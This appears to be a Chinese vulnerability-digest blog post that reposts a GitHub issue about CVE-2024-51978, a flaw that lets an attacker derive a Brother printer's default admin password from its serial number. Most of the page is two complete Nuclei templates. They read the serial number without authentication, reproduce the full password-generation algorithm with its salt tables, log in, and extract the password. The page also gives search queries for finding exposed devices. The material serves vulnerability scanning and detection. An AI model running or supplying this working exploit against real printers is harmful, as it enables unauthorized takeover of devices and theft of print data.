Brother Printers Authentication Bypass via Default Admin Password

漏洞信息

漏洞名称： Brother Printers Authentication Bypass via Default Admin Password

漏洞编号：

CVE： CVE-2024-51978

漏洞类型： 弱口令

漏洞等级： 严重

漏洞描述： 该漏洞影响Brother品牌的打印机设备，允许攻击者通过泄露目标设备的序列号，生成目标设备的默认管理员密码。Brother打印机是企业及个人用户中广泛使用的打印设备，支持网络打印功能，常部署于办公环境中。漏洞的技术根源在于设备默认使用了基于序列号的弱密码生成算法，且序列号可能通过未认证的HTTP、HTTPS、IPP、SNMP或PJL请求泄露。攻击者无需认证即可利用此漏洞，通过生成的默认密码获取设备的完全控制权限，可能导致敏感信息泄露、设备配置被篡改或打印服务被滥用。此漏洞的CVSS评分为9.8，属于严重级别，因其无需用户交互即可远程利用，且影响广泛部署的设备。

产品厂商： Brother

产品名称： Brother Printers

搜索语法： app=”brother-Printer”

来源： https://github.com/projectdiscovery/nuclei-templates/issues/12517

类型： projectdiscovery/nuclei-templates:github issues

来源概述

Is there an existing template for this?

I have searched the existing templates.

Nuclei Template

id: CVE-2024-51978

info:
  name: Brother Printers – Authentication Bypass via Default Admin Password
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    By leaking a target device's serial number, a remote attacker can generate the target device's default administrator password.
    The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP, SNMP, or PJL requests.
  reference:
    - https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed
    - https://github.com/sfewer-r7/BrotherVulnerabilities
    - https://support.brother.com/g/b/faqend.aspx?c=eu_ot&lang=en&prod=group2&faqid=faq00100846_000
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cve-id: CVE-2024-51978
  metadata:
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,authentication,default-login

## Flow: Extract serial → Generate password → Login attempt
flow: http(1) && javascript() && http(2) & http(3)

javascript:
  - code: |
      let SALT_LOOKUP_TABLE = [
          0x06, 0x1A, 0x80, 0x93, 0x90, 0x60, 0xA4, 0x18, 0x76, 0xA8, 0xFA, 0x98, 0x58, 0x25, 0x5F, 0xBA,
          0x24, 0xCF, 0xDD, 0xB6, 0xD0, 0xE3, 0x7A, 0x68, 0x41, 0x8B, 0x21, 0x15, 0x7E, 0x65, 0x70, 0x7F,
          0x8C, 0x91, 0x3B, 0xFC, 0x13, 0x4A, 0xBE, 0xD7, 0x6C, 0x99, 0xC3, 0xD1, 0x51, 0x35, 0xDF, 0x23,
          0xB0, 0x3F, 0x3D, 0x16, 0x29, 0xA1, 0x59, 0xCA, 0xA2, 0x5C, 0x43, 0x0B, 0xA5, 0x36, 0xF0, 0xFE,
          0x3E, 0xED, 0xF2, 0xE6, 0xEA, 0x54, 0x66, 0x7D, 0xEE, 0x3C, 0x50, 0xEF, 0x9E, 0xD3, 0xB1, 0xF7,
          0xAC, 0x5A, 0x6E, 0x12, 0x2A, 0x01, 0x46, 0x8F, 0x6B, 0x88, 0x0E, 0x52, 0xF9, 0x81, 0xA0, 0x02,
          0xC1, 0xF1, 0xE9, 0xC2, 0xF6, 0x33, 0xCB, 0xB3, 0x73, 0x17, 0xFD, 0x6F, 0xF4, 0xEC, 0x84, 0xC6,
          0x47, 0xCE, 0x9F, 0xD5, 0x92, 0x85, 0x53, 0x26, 0x27, 0x62, 0xEB, 0xAE, 0x3A, 0x1F, 0x0F, 0x94,
          0x95, 0x82, 0x8E, 0x42, 0x28, 0xB9, 0xBF, 0xAF, 0xD4, 0x48, 0xD9, 0xC5, 0x4C, 0x64, 0x2B, 0x8D,
          0xF8, 0xAA, 0xC4, 0x63, 0x87, 0xE4, 0x1D, 0xA6, 0x14, 0xCD, 0xBB, 0xC0, 0xE5, 0xDA, 0x37, 0xC9,
          0xE8, 0xB8, 0x67, 0xDC, 0x5D, 0xA7, 0xAD, 0x79, 0x44, 0xF3, 0x83, 0xA9, 0x1B, 0x96, 0x89, 0xAB,
          0x45, 0xBC, 0x1C, 0xB4, 0xE1, 0x20, 0x2F, 0x49, 0x22, 0x86, 0xDB, 0x4E, 0xE0, 0x9B, 0x10, 0x19,
          0x97, 0x61, 0x40, 0x78, 0x5E, 0x39, 0xCC, 0x0D, 0x09, 0x9D, 0x34, 0x0C, 0x2E, 0x0A, 0x77, 0x6D,
          0xDE, 0xC7, 0xD8, 0xA3, 0xE2, 0x56, 0xB5, 0x4B, 0x38, 0x74, 0x8A, 0xBD, 0x6A, 0x4F, 0x07, 0x03,
          0x05, 0xFF, 0xF5, 0x31, 0x1E, 0xE7, 0xD2, 0x2D, 0x69, 0xC8, 0x5B, 0xD6, 0x57, 0x75, 0x7C, 0xB2,
          0x72, 0xB7, 0x2C, 0xFB, 0x11, 0x9C, 0x7B, 0x32, 0x55, 0x30, 0x71, 0x04, 0x9A, 0x4D, 0x08, 0x100
        ]
      let SALT_DATA_TABLE = [
          'aiaFrJAn', 'FuUcjKwa', 'cMnDTitZ', 'RuSfzwJC', 'XXrLDVub', 'znimXRSU', 'dLdJgcZf', 'rgm32u2x',
          '7HOLDhk\'', 'ENbuNZVy', 'eCd6Ygyf', 'gmLt2GuL', '5dhjHet3', 'nPtN7h23', '47rdTTV7', 'KAkaSzWh',
          's3m7wwW2', 'wtBGnGjn', 'H3LyF$dd', 'H6EtSew2', 'D9N8iJBB', 'tPT4ZKm3', 'XEEV4tjf', 'zDXx93rw',
          'HKkmbGjD', 'ng5sLECe', 'QrPVDngu', 'LPMhpZe9', 'uLzhjUwc', 'Sa9QBKW2', 'AfrPdj7y', 'ujmt9s72',
          'n8Y7XrFx', '8xeRU7rW', 'RUzpQznp', '%hU5RMxP', 'ipaZKMEW', 'chP5cHCy', 'b5UJabgU', 'WtZsF7VF',
          'xk8wg669', 'gAVynzbw', 'GuRgNxkm', 'UBCAUb85', 'CQgQhyfp', 'fcEegCtB', '5LSpTNPN', 'dzrQdahF',
          'kD4fHLhM', 'mHQ6QAUg', 'TjZ6kiAb', '5SMdwEK6', 'RD2ytHHH', 'XgQHBfBY', '6ZZRVbHx', 'BNDUsFCC',
          'iSwrrtpr', 'ucBFJbGj', 'Nzs7rhKJ', 'uHugTJX5', 'aXN3FsUF', 'uyHDwwUK', 'tbnJTYje', 'SmgfLZ2n',
          '4sXy9D8j', 'YLVSee68', '3U5TbNNS', 'QjYfTBKu', 'T*8AF8dk', 'F8xQDTrW', 'Pyeda62U', '33sghDrE',
          'ThiW9Naz', 'BU9TDd7k',
          '72sgwM&G', 'VkV+uSUt', 'HpTdi9jL', 'G3AbGyAH', 'zbW8YCSy', 'eKB25SCe',
          'rbzpCtQN', 'EZSRB966', 'nJAxxUbS', '7GZRAG9E', 'PaMCwYGQ', 'TZy2AeYr', 'jMgYEPUT', '6QAepcUc',
          'jdWU9pXy', 'CeZs6T8g', 'jEEDBNPn', 'fCHg4V5W', 'rTUUjyPG', '3L5SNJhr', 'XbXK4Lg9', 'ZcdGAzLH',
          'ANfMJ&6p', 'S4URfyzc', 'Pai9muCn', 'Nei%6NwR', 'BnUWBHg6', 'FwGyWrux', 'mwkuuGXX', 'WR$LK5Qu',
          'Lxs4DgNM', 'KAYMHcKy', 'UnWYeeUp', '2cc3EzeX', '7nVPpdCd', 'LDPgHa9b', 'Yfwsz7zR', 'tGhb9Ych',
          'Gxi4S8jC', 'QEiWU2cm', 'PFhyTxjN', 'LrpTgGLw', 'PUfziDzE', 'ACbmRneN', 'gYmjyNjF', 'RuZctKSS',
          'k8KdHgDB', 'pJEA3hSG', 'X6rbghrk', '9mnbf3up', '4WU2hMHx', 'TgmNEn45', 'zRnQReEn', 'DfsPzxsX',
          'UyScxhhw', 'knEsS3CX', 'xuPUKwFf', 'Ks4nKt2z', 'trBf!b67', 'rhHgt4gX', '2N8sPf#d', 'eFMjhMcB',
          'aWLeRu9M', '4MiN4D63', '5nG9jMGh', 'SA5pnyQ6', 'UnSQ94nx', 'kPjzBBxy', '6CppHT3R', '3VPgRgiL',
          'cP9JJDJr', 'MyMWzUMj', 'xyG4ACEd', 'dbnAbG8e', 'RnHGYc6F', 'ktCQnJWk', 'XBt5Vxr2', 'wH6iY9f9',
          'atB4eri8', '8SdHujf8', 'inLRdn5s', 'Fh3N*pWc', 'Fb3XYtZz', 'GADACWcS', 'r8tsDgph', 'EumHNmFg',
          'rRFKrK2x', 'TQ9nUnNk', 'P5hss6GX', 'mX8ZSQtr', 'BJMjyd7H', 'EC7r5fEm', 'TPjQpDaa', 'SZeMDpfR',
          'XEDJeraW', 'YYNTgsah', '6uupfWF!', '7RcTLwHX', 'ycYr3dwT', '7VwCnTFQ', 'JGF6iigf', 'M72Kea4f',
          'ZxfZWbVb', 'NcT3LGBV', 'HBU68uaa', 'UeHK4pnf', 'sDjzNHHd', 'CGjgeutc', 'PC4JbuC2', 'tNYQc7Xs',
          'RGNsJQhD', 'HKEh2fba', '49x4PLUz', 'N6MLNkY5', 'NrMHeE9d', 'j5NkznV4', 'n8At3YKi', 'ZnHwAEnZ',
          '3LnUmF8E', 'RBXzdUpA', 'FwGHBVej', '3wkkik7E', 'fpyGnp2u', 'ANBwfiPb', 'Ztt8X9zG', '47K7QWix',
          'TzJfUdNY', 'hpD?MEAm', 'sJRh4Jni', 'TyQUgEEH', 'FBJnWWwx', '7cN3GH6e', 'hWQhzFTN', 'GamDhsgZ',
          'yXM4cZKt', '9BJPKtaC', 'NVNpe4kJ', 'uSyxGxbz', 'h5zTpV3U', 'TAajcQ4h', 'VjYMEusS', 'Wpj237VG',
          'yAjHYVVV', 'Hb6k7Cwe', 'yZbuDBEi', 'S4wpBmZM', 'DwFra8wk', 'j#Pk5r9W', 'PjkfS9WB', 'gHf3YGA3',
          'ihDtdUCu', 'KARzJDfR', 'M7fApB5U', 'MiD44gRC', 'RdEM8y5W', '4GsGuPag', 'pETQc4k2', 'pZZu7Ras',
          'AJReAUBy', 'EAMmQsWe', 'BeC2XJi8', 'PujT2eRf', '2UXLeAJu', 'hMPbY3MQ', 'QeawRP*p', 'SbCbW9Tf',
          'EhNNtLyj', 'B8RjceGs', 'LaydmLeD', 'JFR7T47f', 'WCbAdTfm', 'srN9gNSE', 'gAn7h8Yp', '4PnTKVse',
          'HDxGwLsN', 'tR8XUSRg', 'wLe-3Xf8', 'zH7cpxsd', 'tCc5sWFX', '3hzTj5BS',
          'hLK6f&g4', 'tCzzSsm7'
        ]
          function strToCharCodes(str) {
              const arr = [];
              for (let i = 0; i < str.length; ++i) arr.push(str.charCodeAt(i));
              return arr;
          }

          function generateDefaultPassword(serial, saltLookupIndex = 254, saltData = null) {
              if (!(0 <= saltLookupIndex && saltLookupIndex < SALT_LOOKUP_TABLE.length)) {
                  throw new Error('SaltLookupIndex must be between 0 and 255');
              }

              if (saltData === null && saltLookupIndex !== 0) {
                  const saltTableIndex = SALT_LOOKUP_TABLE[saltLookupIndex];
                  if (saltTableIndex >= SALT_DATA_TABLE.length) {
                      throw new Error('Unknown salt table data at salt table index');
                  }
                  saltData = strToCharCodes(SALT_DATA_TABLE[saltTableIndex]);
              }

              if (!saltData || saltData.length !== 8) {
                  throw new Error('SaltData must be 8 bytes');
              }

              // Use nuclei's Buffer implementation
              const bytes = require('nuclei/bytes');
              const buffer = new bytes.Buffer();

              // Write the first 16 chars of serial as string
              buffer.WriteString(serial.slice(0, 16));

              // Prepare salt bytes in reverse order, minus 1
              const saltBytes = [
                  saltData[7] - 1, saltData[6] - 1, saltData[5] - 1, saltData[4] - 1,
                  saltData[3] - 1, saltData[2] - 1, saltData[1] - 1, saltData[0] - 1
              ];
              buffer.Write(saltBytes);

              // Get the buffer as a byte array
              result=buffer.Hex()
              return result;
          }
          generateDefaultPassword(serial)
    args:
      serial: "{{trim_space(replace(replace(replace_regex(srno,'(BR[A-Z0-9]+)',''),']',''),'[',''))}}"

http:
  - raw:
      - |
        GET /etc/mnt_info.csv HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'Main Firmware Version','Model Name') && status_code == 200
        internal: true

    extractors:
      - type: regex
        part: body
        name: srno
        group: 1
        regex:
          - '"(\w{15})"'
        internal: true

  - raw:
      - |
        GET /general/status.html HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: logbox
        group: 1
        regex:
          - 'id="LogBox" name="(.*?)"'
        internal: true

      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'id="CSRFToken" name="CSRFToken" value="(.*?)"'
        internal: true

  - raw:
      - |
        POST /general/status.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{logbox}}={{urlencode(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>'))}}&loginurl=/general/status.html&CSRFToken={{urlencode(csrf)}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 || status_code == 301'
          - 'contains(set_cookie,"AuthCookie=") && !contains(location,"/etc/passerror.html")'
        condition: and

    extractors:
      - type: dsl
        name: login_password
        dsl:
          - replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>')
## digest: 4b0a00483046022100aa505d8c1409cf11663aa9355426078e205cfc41901fb1e08a44a406230eb8970221009e9898284dd4e033889557ddd85718ee2bfbb695ba5eb8ec112f78ed73a9586d:922c64590222798bb761d5b6d8e72950

Relevant dumped responses

Anything else?

The template fails quietly if target web site does not return a CSRF token in its response checked in this snippet:

extractors:
  - type: regex
    part: body
    name: logbox
    group: 1
    regex:
      - 'id="LogBox" name="(.*?)"'
    internal: true

  - type: regex
    part: body
    name: csrf
    group: 1
    regex:
      - 'id="CSRFToken" name="CSRFToken" value="(.*?)"'
    internal: true

Example output:
[WRN] [CVE-2024-51978] Could not make http request for https://xxx.xx.xx.xx: unresolved variables found: urlencode(csrf)

A website which does not return any token can still be vulnerable. As you can see in the first screenshot, it does not find the vulnerability

When i send CSRFToken value as empty, it does find it

The template should handle both situations. My suggestion is to send two seperate POST requests, one with csrf and one without it:


id: CVE-2024-51978

info:
  name: Brother Printers – Authentication Bypass via Default Admin Password
  author: iamnoooob,pdresearch,MathematicianGoat
  severity: critical
  description: |
    By leaking a target device's serial number, a remote attacker can generate the target device's default administrator password.
    The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP, SNMP, or PJL requests.
  reference:
    - https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed
    - https://github.com/sfewer-r7/BrotherVulnerabilities
    - https://support.brother.com/g/b/faqend.aspx?c=eu_ot&lang=en&prod=group2&faqid=faq00100846_000
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cve-id: CVE-2024-51978
  metadata:
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,authentication,default-login

## Flow: Extract serial → Generate password → Login attempt
flow: http(1) && javascript() && http(2) & http(3) & http(4)

javascript:
  - code: |
      let SALT_LOOKUP_TABLE = [
          0x06, 0x1A, 0x80, 0x93, 0x90, 0x60, 0xA4, 0x18, 0x76, 0xA8, 0xFA, 0x98, 0x58, 0x25, 0x5F, 0xBA,
          0x24, 0xCF, 0xDD, 0xB6, 0xD0, 0xE3, 0x7A, 0x68, 0x41, 0x8B, 0x21, 0x15, 0x7E, 0x65, 0x70, 0x7F,
          0x8C, 0x91, 0x3B, 0xFC, 0x13, 0x4A, 0xBE, 0xD7, 0x6C, 0x99, 0xC3, 0xD1, 0x51, 0x35, 0xDF, 0x23,
          0xB0, 0x3F, 0x3D, 0x16, 0x29, 0xA1, 0x59, 0xCA, 0xA2, 0x5C, 0x43, 0x0B, 0xA5, 0x36, 0xF0, 0xFE,
          0x3E, 0xED, 0xF2, 0xE6, 0xEA, 0x54, 0x66, 0x7D, 0xEE, 0x3C, 0x50, 0xEF, 0x9E, 0xD3, 0xB1, 0xF7,
          0xAC, 0x5A, 0x6E, 0x12, 0x2A, 0x01, 0x46, 0x8F, 0x6B, 0x88, 0x0E, 0x52, 0xF9, 0x81, 0xA0, 0x02,
          0xC1, 0xF1, 0xE9, 0xC2, 0xF6, 0x33, 0xCB, 0xB3, 0x73, 0x17, 0xFD, 0x6F, 0xF4, 0xEC, 0x84, 0xC6,
          0x47, 0xCE, 0x9F, 0xD5, 0x92, 0x85, 0x53, 0x26, 0x27, 0x62, 0xEB, 0xAE, 0x3A, 0x1F, 0x0F, 0x94,
          0x95, 0x82, 0x8E, 0x42, 0x28, 0xB9, 0xBF, 0xAF, 0xD4, 0x48, 0xD9, 0xC5, 0x4C, 0x64, 0x2B, 0x8D,
          0xF8, 0xAA, 0xC4, 0x63, 0x87, 0xE4, 0x1D, 0xA6, 0x14, 0xCD, 0xBB, 0xC0, 0xE5, 0xDA, 0x37, 0xC9,
          0xE8, 0xB8, 0x67, 0xDC, 0x5D, 0xA7, 0xAD, 0x79, 0x44, 0xF3, 0x83, 0xA9, 0x1B, 0x96, 0x89, 0xAB,
          0x45, 0xBC, 0x1C, 0xB4, 0xE1, 0x20, 0x2F, 0x49, 0x22, 0x86, 0xDB, 0x4E, 0xE0, 0x9B, 0x10, 0x19,
          0x97, 0x61, 0x40, 0x78, 0x5E, 0x39, 0xCC, 0x0D, 0x09, 0x9D, 0x34, 0x0C, 0x2E, 0x0A, 0x77, 0x6D,
          0xDE, 0xC7, 0xD8, 0xA3, 0xE2, 0x56, 0xB5, 0x4B, 0x38, 0x74, 0x8A, 0xBD, 0x6A, 0x4F, 0x07, 0x03,
          0x05, 0xFF, 0xF5, 0x31, 0x1E, 0xE7, 0xD2, 0x2D, 0x69, 0xC8, 0x5B, 0xD6, 0x57, 0x75, 0x7C, 0xB2,
          0x72, 0xB7, 0x2C, 0xFB, 0x11, 0x9C, 0x7B, 0x32, 0x55, 0x30, 0x71, 0x04, 0x9A, 0x4D, 0x08, 0x100
        ]
      let SALT_DATA_TABLE = [
          'aiaFrJAn', 'FuUcjKwa', 'cMnDTitZ', 'RuSfzwJC', 'XXrLDVub', 'znimXRSU', 'dLdJgcZf', 'rgm32u2x',
          '7HOLDhk\'', 'ENbuNZVy', 'eCd6Ygyf', 'gmLt2GuL', '5dhjHet3', 'nPtN7h23', '47rdTTV7', 'KAkaSzWh',
          's3m7wwW2', 'wtBGnGjn', 'H3LyF$dd', 'H6EtSew2', 'D9N8iJBB', 'tPT4ZKm3', 'XEEV4tjf', 'zDXx93rw',
          'HKkmbGjD', 'ng5sLECe', 'QrPVDngu', 'LPMhpZe9', 'uLzhjUwc', 'Sa9QBKW2', 'AfrPdj7y', 'ujmt9s72',
          'n8Y7XrFx', '8xeRU7rW', 'RUzpQznp', '%hU5RMxP', 'ipaZKMEW', 'chP5cHCy', 'b5UJabgU', 'WtZsF7VF',
          'xk8wg669', 'gAVynzbw', 'GuRgNxkm', 'UBCAUb85', 'CQgQhyfp', 'fcEegCtB', '5LSpTNPN', 'dzrQdahF',
          'kD4fHLhM', 'mHQ6QAUg', 'TjZ6kiAb', '5SMdwEK6', 'RD2ytHHH', 'XgQHBfBY', '6ZZRVbHx', 'BNDUsFCC',
          'iSwrrtpr', 'ucBFJbGj', 'Nzs7rhKJ', 'uHugTJX5', 'aXN3FsUF', 'uyHDwwUK', 'tbnJTYje', 'SmgfLZ2n',
          '4sXy9D8j', 'YLVSee68', '3U5TbNNS', 'QjYfTBKu', 'T*8AF8dk', 'F8xQDTrW', 'Pyeda62U', '33sghDrE',
          'ThiW9Naz', 'BU9TDd7k',
          '72sgwM&G', 'VkV+uSUt', 'HpTdi9jL', 'G3AbGyAH', 'zbW8YCSy', 'eKB25SCe',
          'rbzpCtQN', 'EZSRB966', 'nJAxxUbS', '7GZRAG9E', 'PaMCwYGQ', 'TZy2AeYr', 'jMgYEPUT', '6QAepcUc',
          'jdWU9pXy', 'CeZs6T8g', 'jEEDBNPn', 'fCHg4V5W', 'rTUUjyPG', '3L5SNJhr', 'XbXK4Lg9', 'ZcdGAzLH',
          'ANfMJ&6p', 'S4URfyzc', 'Pai9muCn', 'Nei%6NwR', 'BnUWBHg6', 'FwGyWrux', 'mwkuuGXX', 'WR$LK5Qu',
          'Lxs4DgNM', 'KAYMHcKy', 'UnWYeeUp', '2cc3EzeX', '7nVPpdCd', 'LDPgHa9b', 'Yfwsz7zR', 'tGhb9Ych',
          'Gxi4S8jC', 'QEiWU2cm', 'PFhyTxjN', 'LrpTgGLw', 'PUfziDzE', 'ACbmRneN', 'gYmjyNjF', 'RuZctKSS',
          'k8KdHgDB', 'pJEA3hSG', 'X6rbghrk', '9mnbf3up', '4WU2hMHx', 'TgmNEn45', 'zRnQReEn', 'DfsPzxsX',
          'UyScxhhw', 'knEsS3CX', 'xuPUKwFf', 'Ks4nKt2z', 'trBf!b67', 'rhHgt4gX', '2N8sPf#d', 'eFMjhMcB',
          'aWLeRu9M', '4MiN4D63', '5nG9jMGh', 'SA5pnyQ6', 'UnSQ94nx', 'kPjzBBxy', '6CppHT3R', '3VPgRgiL',
          'cP9JJDJr', 'MyMWzUMj', 'xyG4ACEd', 'dbnAbG8e', 'RnHGYc6F', 'ktCQnJWk', 'XBt5Vxr2', 'wH6iY9f9',
          'atB4eri8', '8SdHujf8', 'inLRdn5s', 'Fh3N*pWc', 'Fb3XYtZz', 'GADACWcS', 'r8tsDgph', 'EumHNmFg',
          'rRFKrK2x', 'TQ9nUnNk', 'P5hss6GX', 'mX8ZSQtr', 'BJMjyd7H', 'EC7r5fEm', 'TPjQpDaa', 'SZeMDpfR',
          'XEDJeraW', 'YYNTgsah', '6uupfWF!', '7RcTLwHX', 'ycYr3dwT', '7VwCnTFQ', 'JGF6iigf', 'M72Kea4f',
          'ZxfZWbVb', 'NcT3LGBV', 'HBU68uaa', 'UeHK4pnf', 'sDjzNHHd', 'CGjgeutc', 'PC4JbuC2', 'tNYQc7Xs',
          'RGNsJQhD', 'HKEh2fba', '49x4PLUz', 'N6MLNkY5', 'NrMHeE9d', 'j5NkznV4', 'n8At3YKi', 'ZnHwAEnZ',
          '3LnUmF8E', 'RBXzdUpA', 'FwGHBVej', '3wkkik7E', 'fpyGnp2u', 'ANBwfiPb', 'Ztt8X9zG', '47K7QWix',
          'TzJfUdNY', 'hpD?MEAm', 'sJRh4Jni', 'TyQUgEEH', 'FBJnWWwx', '7cN3GH6e', 'hWQhzFTN', 'GamDhsgZ',
          'yXM4cZKt', '9BJPKtaC', 'NVNpe4kJ', 'uSyxGxbz', 'h5zTpV3U', 'TAajcQ4h', 'VjYMEusS', 'Wpj237VG',
          'yAjHYVVV', 'Hb6k7Cwe', 'yZbuDBEi', 'S4wpBmZM', 'DwFra8wk', 'j#Pk5r9W', 'PjkfS9WB', 'gHf3YGA3',
          'ihDtdUCu', 'KARzJDfR', 'M7fApB5U', 'MiD44gRC', 'RdEM8y5W', '4GsGuPag', 'pETQc4k2', 'pZZu7Ras',
          'AJReAUBy', 'EAMmQsWe', 'BeC2XJi8', 'PujT2eRf', '2UXLeAJu', 'hMPbY3MQ', 'QeawRP*p', 'SbCbW9Tf',
          'EhNNtLyj', 'B8RjceGs', 'LaydmLeD', 'JFR7T47f', 'WCbAdTfm', 'srN9gNSE', 'gAn7h8Yp', '4PnTKVse',
          'HDxGwLsN', 'tR8XUSRg', 'wLe-3Xf8', 'zH7cpxsd', 'tCc5sWFX', '3hzTj5BS',
          'hLK6f&g4', 'tCzzSsm7'
        ]
          function strToCharCodes(str) {
              const arr = [];
              for (let i = 0; i < str.length; ++i) arr.push(str.charCodeAt(i));
              return arr;
          }

          function generateDefaultPassword(serial, saltLookupIndex = 254, saltData = null) {
              if (!(0 <= saltLookupIndex && saltLookupIndex < SALT_LOOKUP_TABLE.length)) {
                  throw new Error('SaltLookupIndex must be between 0 and 255');
              }

              if (saltData === null && saltLookupIndex !== 0) {
                  const saltTableIndex = SALT_LOOKUP_TABLE[saltLookupIndex];
                  if (saltTableIndex >= SALT_DATA_TABLE.length) {
                      throw new Error('Unknown salt table data at salt table index');
                  }
                  saltData = strToCharCodes(SALT_DATA_TABLE[saltTableIndex]);
              }

              if (!saltData || saltData.length !== 8) {
                  throw new Error('SaltData must be 8 bytes');
              }

              // Use nuclei's Buffer implementation
              const bytes = require('nuclei/bytes');
              const buffer = new bytes.Buffer();

              // Write the first 16 chars of serial as string
              buffer.WriteString(serial.slice(0, 16));

              // Prepare salt bytes in reverse order, minus 1
              const saltBytes = [
                  saltData[7] - 1, saltData[6] - 1, saltData[5] - 1, saltData[4] - 1,
                  saltData[3] - 1, saltData[2] - 1, saltData[1] - 1, saltData[0] - 1
              ];
              buffer.Write(saltBytes);

              // Get the buffer as a byte array
              result=buffer.Hex()
              return result;
          }
          generateDefaultPassword(serial)
    args:
      serial: "{{trim_space(replace(replace(replace_regex(srno,'(BR[A-Z0-9]+)',''),']',''),'[',''))}}"


http:
  - raw:
      - |
        GET /etc/mnt_info.csv HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'Main Firmware Version','Model Name') && status_code == 200
        internal: true

    extractors:
      - type: regex
        part: body
        name: srno
        group: 1
        regex:
          - '"(\w{15})"'
        internal: true

  - raw:
      - |
        GET /general/status.html HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: logbox
        group: 1
        regex:
          - 'id="LogBox" name="(.*?)"'
        internal: true

      - type: regex
        part: body
        name: csrf
        group: 1
        internal: true
        regex:
          - 'id="CSRFToken" name="CSRFToken" value="(.*?)"'

  - raw:
      - |
        POST /general/status.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{logbox}}={{urlencode(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>'))}}&loginurl=/general/status.html&CSRFToken=
    
    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 || status_code == 301'
          - 'contains(set_cookie,"AuthCookie=") && !contains(location,"/etc/passerror.html")'
        condition: and

    extractors:
      - type: dsl
        name: login_password
        dsl:
          - replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>')


  - raw:
      - |
        POST /general/status.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{logbox}}={{urlencode(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>'))}}&loginurl=/general/status.html&CSRFToken={{urlencode(csrf)}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 || status_code == 301'
          - 'contains(set_cookie,"AuthCookie=") && !contains(location,"/etc/passerror.html")'
        condition: and

    extractors:
      - type: dsl
        name: login_password
        dsl:
          - replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>')
## digest: 4b0a00483046022100aa505d8c1409cf11663aa9355426078e205cfc41901fb1e08a44a406230eb8970221009e9898284dd4e033889557ddd85718ee2bfbb695ba5eb8ec112f78ed73a9586d:922c64590222798bb761d5b6d8e72950

Github Poc

#projectdiscovery/nuclei-templates:github issues #弱口令

Brother Printers Authentication Bypass via Default Admin Password

http://example.com/2025/07/08/github_4020068612/

作者

lianccc

发布于

2025年7月8日

许可协议

_r_netsec Twitter Update ! 上一篇

pgAdmin 4 OAuth2 Authentication Bypass Vulnerability 下一篇